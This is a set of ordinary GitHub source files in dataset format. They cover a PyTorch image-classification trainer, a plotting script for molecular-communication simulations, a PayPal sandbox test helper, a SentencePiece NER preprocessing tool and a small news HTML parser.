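# below assembles them roughly like this (values from
# mobilenet_v2_train_params; momentum=0.9 is hardcoded by the trainer):
from torch.optim import SGD, lr_scheduler
from torchvision.models import mobilenet_v2

model = mobilenet_v2(pretrained=False)
optimizer = SGD(model.parameters(), lr=0.045, momentum=0.9, weight_decay=4e-5)
scheduler = lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.98)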
Adaugati model '.pt' sau '.pth' \")\r\n\r\ntry:\r\n import torch\r\n import torchvision\r\nexcept:\r\n try:\r\n import tensorflow\r\n import keras\r\n\r\n raise RuntimeError(\"Lipsa Torch\")\r\n except:\r\n raise RuntimeError(\"Torch neinstalat\")\r\n\r\nclass ClassificationModelTrainer():\r\n def __init__(self) -> None:\r\n self.__model_type = \"\"\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__data_dir = \"\"\r\n self.__data_loaders = None\r\n self.__class_names = None\r\n self.__dataset_sizes = None\r\n self.__dataset_name = \"\"\r\n self.__model = None\r\n self.__optimizer = None\r\n self.__lr_scheduler = None\r\n self.__loss_fn = nn.CrossEntropyLoss()\r\n self.__transfer_learning_mode = \"fine_tune_all\"\r\n self.__model_path = \"\"\r\n self.__training_params = None\r\n\r\n def __set_training_param(self) -> None:\r\n if not self.__model_type:\r\n raise RuntimeError(\"The model type is not set!!!\")\r\n self.__model = self.__training_params[\"model\"]\r\n optimizer = self.__training_params[\"optimizer\"]\r\n lr_decay_rate = self.__training_params[\"lr_decay_rate\"]\r\n lr_step_size = self.__training_params[\"lr_step_size\"]\r\n lr = self.__training_params[\"lr\"]\r\n weight_decay = self.__training_params[\"weight_decay\"]\r\n\r\n if self.__model_path:\r\n self.__set_transfer_learning_mode()\r\n print(\"==> Transfer learning enabled\")\r\n\r\n \r\n \r\n \r\n if self.__model_type == \"mobilenet_v2\":\r\n in_features = self.__model.classifier[1].in_features\r\n self.__model.classifier[1] = nn.Linear(in_features, len(self.__class_names))\r\n elif self.__model_type == \"densenet121\":\r\n in_features = self.__model.classifier.in_features\r\n self.__model.classifier = nn.Linear(in_features, len(self.__class_names))\r\n else:\r\n in_features = self.__model.fc.in_features\r\n self.__model.fc = nn.Linear(in_features, len(self.__class_names))\r\n\r\n self.__model.to(self.__device)\r\n self.__optimizer = optimizer(\r\n self.__model.parameters(),\r\n lr=lr,\r\n momentum=0.9,\r\n weight_decay=weight_decay\r\n )\r\n if lr_decay_rate and lr_step_size:\r\n self.__lr_scheduler = lr_scheduler.StepLR(\r\n self.__optimizer,\r\n gamma=lr_decay_rate,\r\n step_size=lr_step_size\r\n )\r\n\r\n def __set_transfer_learning_mode(self) -> None:\r\n\r\n state_dict = torch.load(self.__model_path)\r\n if self.__model_type == \"densenet121\":\r\n \r\n \r\n pattern = re.compile(\r\n r\"^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.\"\r\n \"(?:weight|bias|running_mean|running_var))$\"\r\n )\r\n for key in list(state_dict.keys()):\r\n res = pattern.match(key)\r\n if res:\r\n new_key = res.group(1) + res.group(2)\r\n state_dict[new_key] = state_dict[key]\r\n del state_dict[key]\r\n\r\n self.__model.load_state_dict(state_dict)\r\n self.__model.to(self.__device)\r\n\r\n if self.__transfer_learning_mode == \"freeze_all\":\r\n for param in self.__model.parameters():\r\n param.requires_grad = False\r\n\r\n def __load_data(self, batch_size: int = 8) -> None:\r\n\r\n if not self.__data_dir:\r\n raise RuntimeError(\"The dataset directory not yet set.\")\r\n image_dataset = {\r\n x: datasets.ImageFolder(\r\n os.path.join(self.__data_dir, x),\r\n data_transforms2[x] if self.__model_type == \"inception_v3\" else data_transforms1[x]\r\n )\r\n for x in [\"train\", \"test\"]\r\n }\r\n self.__data_loaders = {\r\n x: torch.utils.data.DataLoader(\r\n image_dataset[x], batch_size=batch_size,\r\n shuffle=True\r\n )\r\n for x in [\"train\", \"test\"]\r\n }\r\n self.__dataset_sizes = {x: 
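# --- Editor's note / sketch: translations of the Romanian strings above:
# extension_check raises "Fara modele .h5" -> "No .h5 models" and
# "Model nevalid ... Adaugati model '.pt' sau '.pth'" -> "Invalid model ...
# Provide a '.pt' or '.pth' model"; the import guard raises "Lipsa Torch" ->
# "Torch missing" (TF/Keras found instead) and "Torch neinstalat" -> "Torch
# not installed". Separately, the head swap in __set_training_param replaces
# the final ImageNet classifier with one sized to the dataset; the same
# pattern in isolation (the class count is a made-up example):
import torch.nn as nn
from torchvision.models import resnet50

model = resnet50(pretrained=False)
model.fc = nn.Linear(model.fc.in_features, 10)
print(model.fc)   # Linear(in_features=2048, out_features=10, bias=True)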
len(image_dataset[x]) for x in [\"train\", \"test\"]}\r\n self.__class_names = image_dataset[\"train\"].classes\r\n self.__dataset_name = os.path.basename(self.__data_dir.rstrip(os.path.sep))\r\n\r\n def setDataDirectory(self, data_directory: str = \"\") -> None:\r\n if os.path.isdir(data_directory):\r\n self.__data_dir = data_directory\r\n return\r\n raise ValueError(\"expected a path to a directory\")\r\n\r\n def setModelTypeAsMobileNetV2(self) -> None:\r\n self.__model_type = \"mobilenet_v2\"\r\n self.__training_params = mobilenet_v2_train_params()\r\n\r\n def setModelTypeAsResNet50(self) -> None:\r\n self.__model_type = \"resnet50\"\r\n self.__training_params = resnet50_train_params()\r\n\r\n def setModelTypeAsInceptionV3(self) -> None:\r\n self.__model_type = \"inception_v3\"\r\n self.__training_params = inception_v3_train_params()\r\n\r\n def setModelTypeAsDenseNet121(self) -> None:\r\n self.__model_type = \"densenet121\"\r\n self.__training_params = densenet121_train_params()\r\n\r\n def freezeAllLayers(self) -> None:\r\n self.__transfer_learning_mode = \"freeze_all\"\r\n\r\n def fineTuneAllLayers(self) -> None:\r\n self.__transfer_learning_mode = \"fine_tune_all\"\r\n\r\n def trainModel(\r\n self,\r\n num_experiments: int = 100,\r\n batch_size: int = 8,\r\n model_directory: str = None,\r\n transfer_from_model: str = None,\r\n verbose: bool = True\r\n ) -> None:\r\n\r\n\r\n self.__load_data(batch_size)\r\n\r\n if transfer_from_model:\r\n extension_check(transfer_from_model)\r\n self.__model_path = transfer_from_model\r\n\r\n self.__set_training_param()\r\n\r\n if not model_directory:\r\n model_directory = os.path.join(self.__data_dir, \"models\")\r\n\r\n if not os.path.exists(model_directory):\r\n os.mkdir(model_directory)\r\n\r\n with open(os.path.join(model_directory, f\"{self.__dataset_name}_model_classes.json\"), \"w\") as f:\r\n classes_dict = {}\r\n class_list = sorted(self.__class_names)\r\n for i in range(len(class_list)):\r\n classes_dict[str(i)] = class_list[i]\r\n json.dump(classes_dict, f)\r\n\r\n since = time.time()\r\n\r\n best_model_weights = copy.deepcopy(self.__model.state_dict())\r\n best_acc = 0.0\r\n prev_save_name, recent_save_name = \"\", \"\"\r\n\r\n print(\"=\" * 50)\r\n print(\"Training with GPU\") if self.__device == \"cuda\" else print(\r\n \"Training with CPU. 
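# --- Editor's sketch: the <dataset>_model_classes.json layout written by
# trainModel above. It persists sorted class names as an index -> name map,
# which is exactly what CustomImageClassification.setJsonPath consumes later:
import json

class_list = sorted(["dog", "cat", "bird"])
classes_dict = {str(i): c for i, c in enumerate(class_list)}
print(json.dumps(classes_dict))   # {"0": "bird", "1": "cat", "2": "dog"}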
This might cause slower train.\")\r\n print(\"=\" * 50)\r\n\r\n for epoch in range(num_experiments):\r\n if verbose:\r\n print(f\"Epoch {epoch + 1}/{num_experiments}\", \"-\" * 10, sep=\"\\n\")\r\n\r\n \r\n for phase in [\"train\", \"test\"]:\r\n if phase == \"train\":\r\n self.__model.train()\r\n else:\r\n self.__model.eval()\r\n\r\n running_loss = 0.0\r\n running_corrects = 0\r\n\r\n \r\n for imgs, labels in tqdm(self.__data_loaders[phase]):\r\n imgs = imgs.to(self.__device)\r\n labels = labels.to(self.__device)\r\n\r\n self.__optimizer.zero_grad()\r\n\r\n with torch.set_grad_enabled(phase == \"train\"):\r\n output = self.__model(imgs)\r\n if self.__model_type == \"inception_v3\" and type(output) == InceptionOutputs:\r\n output = output[0]\r\n _, preds = torch.max(output, 1)\r\n loss = self.__loss_fn(output, labels)\r\n\r\n if phase == \"train\":\r\n loss.backward()\r\n self.__optimizer.step()\r\n running_loss += loss.item() * imgs.size(0)\r\n running_corrects += torch.sum(preds == labels.data)\r\n\r\n \r\n if phase == \"train\" and isinstance(self.__lr_scheduler, torch.optim.lr_scheduler.StepLR):\r\n self.__lr_scheduler.step()\r\n\r\n epoch_loss = running_loss / self.__dataset_sizes[phase]\r\n epoch_acc = running_corrects.double() / self.__dataset_sizes[phase]\r\n\r\n if verbose:\r\n print(f\"{phase} Loss: {epoch_loss:.4f} Accuracy: {epoch_acc:.4f}\")\r\n if phase == \"test\" and epoch_acc > best_acc:\r\n best_acc = epoch_acc\r\n recent_save_name = self.__model_type + f\"-{self.__dataset_name}-test_acc_{best_acc:.5f}_epoch-{epoch}.pt\"\r\n if prev_save_name:\r\n os.remove(os.path.join(model_directory, prev_save_name))\r\n best_model_weights = copy.deepcopy(self.__model.state_dict())\r\n torch.save(\r\n best_model_weights, os.path.join(model_directory, recent_save_name)\r\n )\r\n prev_save_name = recent_save_name\r\n\r\n time_elapsed = time.time() - since\r\n print(f\"Training completed in {time_elapsed // 60:.0f}m {time_elapsed % 60:.0f}s\")\r\n print(f\"Best test accuracy: {best_acc:.4f}\")\r\n\r\n\r\nclass CustomImageClassification:\r\n\r\n def __init__(self) -> None:\r\n self.__model = None\r\n self.__model_type = \"\"\r\n self.__model_loaded = False\r\n self.__device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n self.__json_path = None\r\n self.__class_names = None\r\n self.__model_loaded = False\r\n\r\n def __load_image(self, image_input: Union[str, np.ndarray, Image.Image]) -> torch.Tensor:\r\n images = []\r\n preprocess = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n if type(image_input) == str:\r\n if os.path.isfile(image_input):\r\n img = Image.open(image_input).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n else:\r\n raise ValueError(f\"image path '{image_input}' is not found or a valid file\")\r\n elif type(image_input) == np.ndarray:\r\n img = Image.fromarray(image_input).convert(\"RGB\")\r\n images.append(preprocess(img))\r\n elif \"PIL\" in str(type(image_input)):\r\n img = image_input.convert(\"RGB\")\r\n images.append(preprocess(img))\r\n else:\r\n raise ValueError(f\"Invalid image input format\")\r\n\r\n return torch.stack(images)\r\n\r\n def __load_classes(self):\r\n if self.__json_path:\r\n with open(self.__json_path, 'r') as f:\r\n self.__class_names = list(json.load(f).values())\r\n else:\r\n raise ValueError(\"Invalid json path. 
Set a valid json mapping path by calling the 'setJsonPath()' function\")\r\n\r\n def setModelPath(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n extension_check(path)\r\n self.__model_path = path\r\n self.__model_loaded = False\r\n else:\r\n raise ValueError(\r\n f\"The path '{path}' isn't a valid file. Ensure you specify the path to a valid trained model file.\"\r\n )\r\n\r\n def setJsonPath(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n self.__json_path = path\r\n else:\r\n raise ValueError(\r\n \"parameter path should be a valid path to the json mapping file.\"\r\n )\r\n\r\n def setModelTypeAsMobileNetV2(self) -> None:\r\n self.__model_type = \"mobilenet_v2\"\r\n\r\n def setModelTypeAsResNet50(self) -> None:\r\n self.__model_type = \"resnet50\"\r\n\r\n def setModelTypeAsInceptionV3(self) -> None:\r\n self.__model_type = \"inception_v3\"\r\n\r\n def setModelTypeAsDenseNet121(self) -> None:\r\n self.__model_type = \"densenet121\"\r\n\r\n def useCPU(self):\r\n self.__device = \"cpu\"\r\n if self.__model_loaded:\r\n self.__model_loaded = False\r\n self.loadModel()\r\n\r\n def loadModel(self) -> None:\r\n\r\n if not self.__model_loaded:\r\n self.__load_classes()\r\n try:\r\n \r\n \r\n \r\n\r\n if self.__model_type == \"resnet50\":\r\n self.__model = resnet50(pretrained=False)\r\n in_features = self.__model.fc.in_features\r\n self.__model.fc = nn.Linear(in_features, len(self.__class_names))\r\n elif self.__model_type == \"mobilenet_v2\":\r\n self.__model = mobilenet_v2(pretrained=False)\r\n in_features = self.__model.classifier[1].in_features\r\n self.__model.classifier[1] = nn.Linear(in_features, len(self.__class_names))\r\n elif self.__model_type == \"inception_v3\":\r\n self.__model = inception_v3(pretrained=False)\r\n in_features = self.__model.fc.in_features\r\n self.__model.fc = nn.Linear(in_features, len(self.__class_names))\r\n elif self.__model_type == \"densenet121\":\r\n self.__model = densenet121(pretrained=False)\r\n in_features = self.__model.classifier.in_features\r\n self.__model.classifier = nn.Linear(in_features, len(self.__class_names))\r\n else:\r\n raise RuntimeError(\"Unknown model type.\\nEnsure the model type is properly set.\")\r\n\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n\r\n if self.__model_type == \"densenet121\":\r\n \r\n \r\n pattern = re.compile(\r\n r\"^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.\"\r\n \"(?:weight|bias|running_mean|running_var))$\"\r\n )\r\n for key in list(state_dict.keys()):\r\n res = pattern.match(key)\r\n if res:\r\n new_key = res.group(1) + res.group(2)\r\n state_dict[new_key] = state_dict[key]\r\n del state_dict[key]\r\n\r\n self.__model.load_state_dict(state_dict)\r\n self.__model.to(self.__device).eval()\r\n self.__model_loaded = True\r\n\r\n except Exception as e:\r\n raise Exception(\"Weight loading failed.\\nEnsure the model path is\"\r\n \" set and the weight file is in the specified model path.\")\r\n\r\n def classifyImage(self, image_input: Union[str, np.ndarray, Image.Image], result_count: int) -> Tuple[\r\n List[str], List[float]]:\r\n if not self.__model_loaded:\r\n raise RuntimeError(\r\n \"Model not yet loaded. 
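# --- Editor's sketch: CustomImageClassification usage with the artefacts
# produced by ClassificationModelTrainer (all file names hypothetical):
custom = CustomImageClassification()
custom.setModelTypeAsResNet50()
custom.setModelPath("models/resnet50-mydata-test_acc_0.95000_epoch-7.pt")
custom.setJsonPath("models/mydata_model_classes.json")
custom.loadModel()
labels, probs = custom.classifyImage("sample.jpg", result_count=3)
print(labels, probs)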
    def classifyImage(self, image_input: Union[str, np.ndarray, Image.Image], result_count: int) -> Tuple[\r\n            List[str], List[float]]:\r\n        if not self.__model_loaded:\r\n            raise RuntimeError(\r\n                \"Model not yet loaded. You need to call '.loadModel()' before performing image classification\"\r\n            )\r\n\r\n        images = self.__load_image(image_input)\r\n        images = images.to(self.__device)\r\n\r\n        with torch.no_grad():\r\n            output = self.__model(images)\r\n            probabilities = torch.softmax(output, dim=1)\r\n            topN_prob, topN_catid = torch.topk(probabilities, result_count)\r\n\r\n        predictions = [\r\n            [\r\n                (self.__class_names[topN_catid[i][j]], topN_prob[i][j].item() * 100)\r\n                for j in range(topN_prob.shape[1])\r\n            ]\r\n            for i in range(topN_prob.shape[0])\r\n        ]\r\n\r\n        labels_pred = []\r\n        probabilities_pred = []\r\n\r\n        for pred in predictions:\r\n            for label, score in pred:\r\n                labels_pred.append(label)\r\n                probabilities_pred.append(round(score, 4))\r\n\r\n        return labels_pred, probabilities_pred","repo_name":"slabuionut/spectraUI","sub_path":"src/detlayer.py","file_name":"detlayer.py","file_ext":"py","file_size_in_byte":154017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"3707458210","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 29 19:33:09 2020\n\n@author: jkpl - eddyazg7\n\"\"\"\nimport csv\nfrom collections import defaultdict\nfrom scipy import stats\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statistics as sta\nimport scipy.stats as st\nimport seaborn as sns\nfrom matplotlib import pyplot\nimport math\n\n\nm_mol = list()\nm_delay = list()\nm_pulse = list()\ni_mol = list()\ni_delay = list()\ni_pulse = list()\n\nNumPaq= 1\n\ndist = ['0.000002','0.000004','0.000006','0.000008','0.000010','0.000012','0.000014',\n        '0.000016','0.000018','0.000020','0.000022','0.000024','0.000026']\n\nBM = 0 # BM type: 0 = free Brownian motion ---- 1 = drift\nNumMol=10000\nD = 1*10**(-9)\ntw = 1050\n \nfor d in range (len(dist)):\n    \n    columns = defaultdict(list) # each value in each column is appended to a list\n    #archivo = \"RxTime-0-0-\"+str(dist[d])+\".csv\" # Node-Type-Distance\n    archivo = \"RxTime-0-\"+str(BM)+\"-\"+dist[d]+\".csv\" # Node-Type-Distance\n    with open(archivo) as f:\n        reader = csv.reader(f)\n        for row in reader:\n            for (i,v) in enumerate(row):\n                columns[i].append(v)\n    \n    max_delay = list()\n    max_mol = list()\n    max_pulse = list()\n    time = list()\n    time1 = list()\n    cont = list()\n    contador=0\n    t0=0\n    \n    delay = pow(float(dist[d]),2)/(D*4)\n    ts = delay + (tw/2)\n    TimeBit = np.zeros((NumPaq*8*NumMol, 3))\n    cg = 0\n    #tp = list()\n\n    for i in range(NumPaq*8):\n        time = list()\n        for j in range(len(row)):\n            if ((columns[j][i] != '0') & (columns[j][i] != '')):\n                time.append(columns[j][i])\n        time.sort()\n        \n        if (len(time) != 0):\n            Tiempo_1Bit_Sup = list() \n            Num_Mol = list()\n            contador = 1\n            for ii in range(len(time)):\n                if ii == len(time)-1:\n                    Tiempo_1Bit_Sup.append(time[len(time)-1])\n                    Num_Mol.append(contador) \n                elif time[ii] == time[ii+1]:\n                    contador = contador + 1\n                else:\n                    Tiempo_1Bit_Sup.append(time[ii])\n                    Num_Mol.append(contador)\n                    contador = 1 \n            \n            aux = max(Num_Mol)\n            max_mol.append(aux)\n            aux = Num_Mol.index(aux)\n            max_delay.append(float(Tiempo_1Bit_Sup[aux]))\n            \n            aux = max(Num_Mol)\n            aux = aux/2\n            \n            bol = True\n            for lk in range(len(Num_Mol)):\n                if (Num_Mol[lk] >= aux) & (bol==True) :\n                    p1 = Tiempo_1Bit_Sup[lk]\n                    bol=False\n                \n                if (Num_Mol[lk] < aux) & (bol==False) :\n                    p2 = Tiempo_1Bit_Sup[lk]\n                    break\n            p1=Tiempo_1Bit_Sup[0]\n            max_pulse.append(float(p2)-float(p1))\n    \n    i_mol.append(max_mol)\n    i_delay.append(max_delay)\n    i_pulse.append(max_pulse)\n    m_mol.append(sta.mean(max_mol))\n    
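# mean peak arrival time and mean pulse width for this distance; compare the\n    # analytic diffusion estimate delay = d**2/(4*D) computed above\n    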
m_delay.append(sta.mean(max_delay))\n m_pulse.append(sta.mean(max_pulse))\n\n\ninterval_mol = np.zeros((5,len(dist)))\nfor i in range(len(i_mol)):\n for j in range(5):\n interval_mol[j][i] = i_mol[i][j]\n\ninterval_delay = np.zeros((5,len(dist)))\nfor i in range(len(i_delay)):\n for j in range(5):\n interval_delay[j][i] = i_delay[i][j] \n\ninterval_pulse = np.zeros((5,len(dist)))\nfor i in range(len(i_pulse)):\n for j in range(5):\n interval_pulse[j][i] = i_pulse[i][j] \n\n\n\nplt.figure(1)\nplt.plot(dist,m_mol,'r')\nsns.tsplot([interval_mol[0], interval_mol[1], interval_mol[2], interval_mol[3], interval_mol[4]] , err_style=\"ci_bars\", interpolate=False)\nplt.xlabel(\"Transmission distance [m]\",fontsize=21)\nplt.ylabel(\"Pulse amplitude [molecules]\",fontsize=21) \nplt.xticks(fontsize=15) \nplt.yticks(np.linspace(0, 450, 10, endpoint=True),fontsize=15)\nplt.grid() \npyplot.savefig(\"amplitud\"+\".png\")\nplt.show()\n\n\nplt.figure(2)\nplt.plot(dist,m_delay,'r')\nsns.tsplot([interval_delay[0], interval_delay[1], interval_delay[2], interval_delay[3], interval_delay[4]] , err_style=\"ci_bars\",interpolate=False)\nplt.xlabel(\"Transmission distance [m]\",fontsize=21)\nplt.ylabel(\"Pulse delay [s]\",fontsize=21) \nplt.xticks(fontsize=15) \nplt.yticks(fontsize=15)\nplt.grid()\npyplot.savefig(\"delay\"+\".png\")\nplt.show()\n\n\nplt.figure(3)\nplt.plot(dist,m_pulse,'r')\nsns.tsplot([interval_pulse[0], interval_pulse[1], interval_pulse[2], interval_pulse[3], interval_pulse[4]] , err_style=\"ci_bars\",interpolate=False)\nplt.xlabel(\"Transmission distance [m]\",fontsize=21)\nplt.ylabel(\"Pulse width [s]\",fontsize=21)\nplt.xticks(fontsize=15) \nplt.yticks(fontsize=15)\nplt.grid() \npyplot.savefig(\"pulse\"+\".png\")\nplt.show()\n\n\n\n","repo_name":"eddyzg7/nanoDMC","sub_path":"Resultados2.py","file_name":"Resultados2.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20210460261","text":"import logging\nfrom pprint import pprint\n\n# %%\nimport requests\n\nlogging.basicConfig(level=logging.DEBUG)\n\n# %%\nspecification = {\n \"client_id\": \"REPLACE_ME\",\n \"secret\": \"REPLACE_ME\",\n \"start_date\": \"2021-06-01T00:00:00+00:00\",\n \"end_date\": \"2021-06-30T00:00:00+00:00\",\n \"is_sandbox\": True,\n}\n\n# %% READ and \n\nclient_id = specification.get(\"client_id\")\nsecret = specification.get(\"secret\")\n\n# %% GET API_TOKEN\n\ntoken_refresh_endpoint = \"https://api-m.sandbox.paypal.com/v1/oauth2/token\"\ndata = \"grant_type=client_credentials\"\nheaders = {\n \"Accept\": \"application/json\",\n \"Accept-Language\": \"en_US\",\n}\n\nresponse = requests.request(\n method=\"POST\",\n url=token_refresh_endpoint,\n data=data,\n headers=headers,\n auth=(client_id, secret),\n)\nresponse_json = response.json()\nprint(response_json)\nAPI_TOKEN = response_json[\"access_token\"]\n\n# CREATE TRANSACTIONS\n# for i in range(1000):\n# create_response = requests.post(\n# \"https://api-m.sandbox.paypal.com/v2/checkout/orders\",\n# headers={'content-type': 'application/json', 'authorization': f'Bearer {API_TOKEN}', \"prefer\": \"return=representation\"},\n# json={\n# \"intent\": \"CAPTURE\",\n# \"purchase_units\": [\n# {\n# \"amount\": {\n# \"currency_code\": \"USD\",\n# \"value\": f\"{float(i)}\"\n# }\n# }\n# ]\n# }\n# )\n#\n# print(create_response.json())\n\n# %% LIST TRANSACTIONS\n\nurl = \"https://api-m.sandbox.paypal.com/v1/reporting/transactions\"\n\nparams = {\n \"start_date\": 
\"2021-06-20T00:00:00+00:00\",\n \"end_date\": \"2021-07-10T07:19:45Z\",\n \"fields\": \"all\",\n \"page_size\": \"100\",\n \"page\": \"1\",\n}\n\nheaders = {\n \"Authorization\": f\"Bearer {API_TOKEN}\",\n \"Content-Type\": \"application/json\",\n}\nresponse = requests.get(\n url,\n headers=headers,\n params=params,\n)\n\npprint(response.json())\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-integrations/connectors/source-paypal-transaction/bin/fixture_helper.py","file_name":"fixture_helper.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"} +{"seq_id":"36811569306","text":"\"\"\"\nCommunications System (COM)\n\nName: COM.py\nDescription:\n \n \nSatellite Function:\n System is Responsible for all\n communications from the satellite. \n\"\"\"\nclass COM:\n def __init__(self):\n self.name = \"COM\"\n\n\n#####################################\n# main function used for testing\n#####################################\ndef main():\n print(\"\\nTESTING\\nCommunications System\\n\")\n #Insert Test Code Here\n com_mod = COM()\n print(com_mod.name)\n \n # End of Testing\n print(\"\\nTesting Complete\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"DrKroeger/SimpleSatelliteSurrogate","sub_path":"COM.py","file_name":"COM.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14324675698","text":"from typing import (\n List\n)\nimport itertools\nfrom tqdm import tqdm\nfrom loguru import logger\nimport sentencepiece as spm\nfrom argparse import ArgumentParser, Namespace\n\nSENTENCEPIECE_MODEL = spm.SentencePieceProcessor()\n\n\ndef main(args: Namespace):\n SENTENCEPIECE_MODEL.Load(args.sentencepiece_model_path)\n for dataset_path in args.dataset_paths:\n logger.info(\n f\"Processing dataset at path: {dataset_path}\",\n feautre='f-strings'\n )\n encoded_dataset = process_dataset(\n at_path=dataset_path,\n tagging_format=args.tagging_format\n )\n save_path = f\"{dataset_path}.spm\"\n logger.success(\n f\"Successfully processed dataset and started saving at path: {save_path}\",\n feature='f-strings'\n )\n with open(save_path, 'w') as file:\n file.write(encoded_dataset)\n logger.success('Saved dataset')\n\n\ndef process_dataset(\n at_path: str,\n tagging_format: str\n) -> str:\n \"\"\"\n Process dataset by encoding tokens with SentencePieceProcessor\n and respectively by adding new tags\n\n Parameters\n ----------\n at_path : `str`, required\n Path to the dataset in CoNLL-2003 format\n tagging_format : `str`, required\n Type of tagging in dataset.\n\n Returns\n -------\n `str`\n Encoded dataset as a string in CoNLL-2003 format\n \"\"\"\n processed_dataset = []\n with open(at_path, \"r\") as data_file:\n # Group into alternative divider / sentence chunks.\n for is_divider, lines in tqdm(itertools.groupby(data_file, is_divider_line),\n desc='Processing lines'):\n # Ignore the divider chunks, so that `lines` corresponds to the words\n # of a single sentence.\n if not is_divider:\n fields = [line.strip().split() for line in lines]\n # unzipping trick returns tuples, but our Fields need lists\n fields = [list(field) for field in zip(*fields)]\n tokens, ner_tags = fields\n # Build new sample after encoding\n sample = build_sentence_piece_tokens_and_tags(\n tokens=tokens,\n tags=ner_tags,\n tagging_format=tagging_format\n )\n processed_dataset.append('\\n'.join(sample))\n return 
'\\n\\n'.join(processed_dataset)\n\n\ndef is_divider_line(line: str) -> bool:\n \"\"\"\n Check whether the line is the divider\n \"\"\"\n empty_line = line.strip() == ''\n if empty_line:\n return True\n else:\n first_token = line.split()[0]\n if first_token == \"-DOCSTART-\":\n return True\n else:\n return False\n\n\ndef build_sentence_piece_tokens_and_tags(\n tokens: List[str],\n tags: List[str],\n tagging_format: str\n) -> List[str]:\n \"\"\"\n Encode tokens with SentencePiece and also expand tags for NER based on encoding\n\n Parameters\n ----------\n tokens : `List[str]`, required\n Tokens from sentence\n tags : `List[str]`, required\n List of tags for each token in sentence\n tagging_format : `str`, required\n Type of tagging in dataset.\n\n Returns\n -------\n `List[str]`\n List of tokens with its corresponding tags separated by space\n \"\"\"\n encoded_tokens = []\n tags_for_encoded_tokens = []\n for i, (token, tag) in enumerate(zip(tokens, tags)):\n encoded_token = SENTENCEPIECE_MODEL.EncodeAsPieces(str(token))\n encoded_tokens.extend([e_token for e_token in encoded_token])\n number_of_tags_to_append = len(encoded_token)\n if tagging_format == 'BIO':\n if tag.startswith('B-'):\n number_of_tags_to_append -= 1\n tags_for_encoded_tokens.append(tag)\n tags_for_encoded_tokens.extend([\n f'I-{tag[2:]}' if tag.startswith('B-') or tag.startswith('I-')\n else 'O' for _ in range(number_of_tags_to_append)\n ])\n elif tagging_format == 'IOB':\n if (\n (tag.startswith('I-') and tags[i - 1][2:] != tag[2:])\n or tag.startswith('B-')\n ):\n number_of_tags_to_append -= 1\n tags_for_encoded_tokens.append(\n f'B-{tag[2:]}' if number_of_tags_to_append > 1 else f'I-{tag[2:]}'\n )\n tags_for_encoded_tokens.extend([\n f'I-{tag[2:]}' if tag.startswith('B-') or tag.startswith('I-')\n else 'O' for _ in range(number_of_tags_to_append)\n ])\n else:\n raise ValueError(\n 'Invalid tagging_format. '\n 'Only BIO and IOB supported.'\n )\n assert len(encoded_tokens) == len(tags_for_encoded_tokens), \\\n \"Number of tokens is not equal to number of tags\"\n return [f\"{word} {tag}\" for word, tag in zip(encoded_tokens, tags_for_encoded_tokens)]\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--dataset_paths', nargs=\"+\", required=True,\n help=\"Paths to dataset for encoding. Ordinary these are train, test and valid datasets\")\n parser.add_argument(\"--sentencepiece_model_path\", help=\"Path to trained SentencePiece model\",\n required=True, type=str)\n parser.add_argument(\"--tagging_format\", required=True, type=str,\n help=\"Type of tagging that is used in the dataset. 
Only BIO and IOB are supported\")\n    main(args=parser.parse_args())\n","repo_name":"Nemexur/NER-with-LSTM-and-Transformer","sub_path":"common/apply_sentencepiece.py","file_name":"apply_sentencepiece.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
{"seq_id":"36472180189","text":"# -*- coding: utf-8 -*-\n\nfrom html.parser import HTMLParser\n\n\nclass News_parser(HTMLParser):\n    def __init__(self):\n        HTMLParser.__init__(self)\n        self.title = False\n        self.link = False\n        self.data = []\n\n    def handle_starttag(self, tag, attrs):\n        attrs = dict(attrs)\n        if tag == \"h2\" and \"class\" in attrs and attrs['class'] == \"esc-lead-article-title\":\n            self.data.append({})\n            self.title = True\n            self.link = True\n\n        if tag == \"a\" and self.link == True:\n            self.data[-1].update({\"link\": attrs[\"href\"]})\n\n    def handle_data(self, data):\n        if self.title == True or self.link == True:\n            self.data[-1].update({\"title\": data})\n            self.title = False\n            self.link = False\n","repo_name":"Taillook/PyNews","sub_path":"py_news/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"}
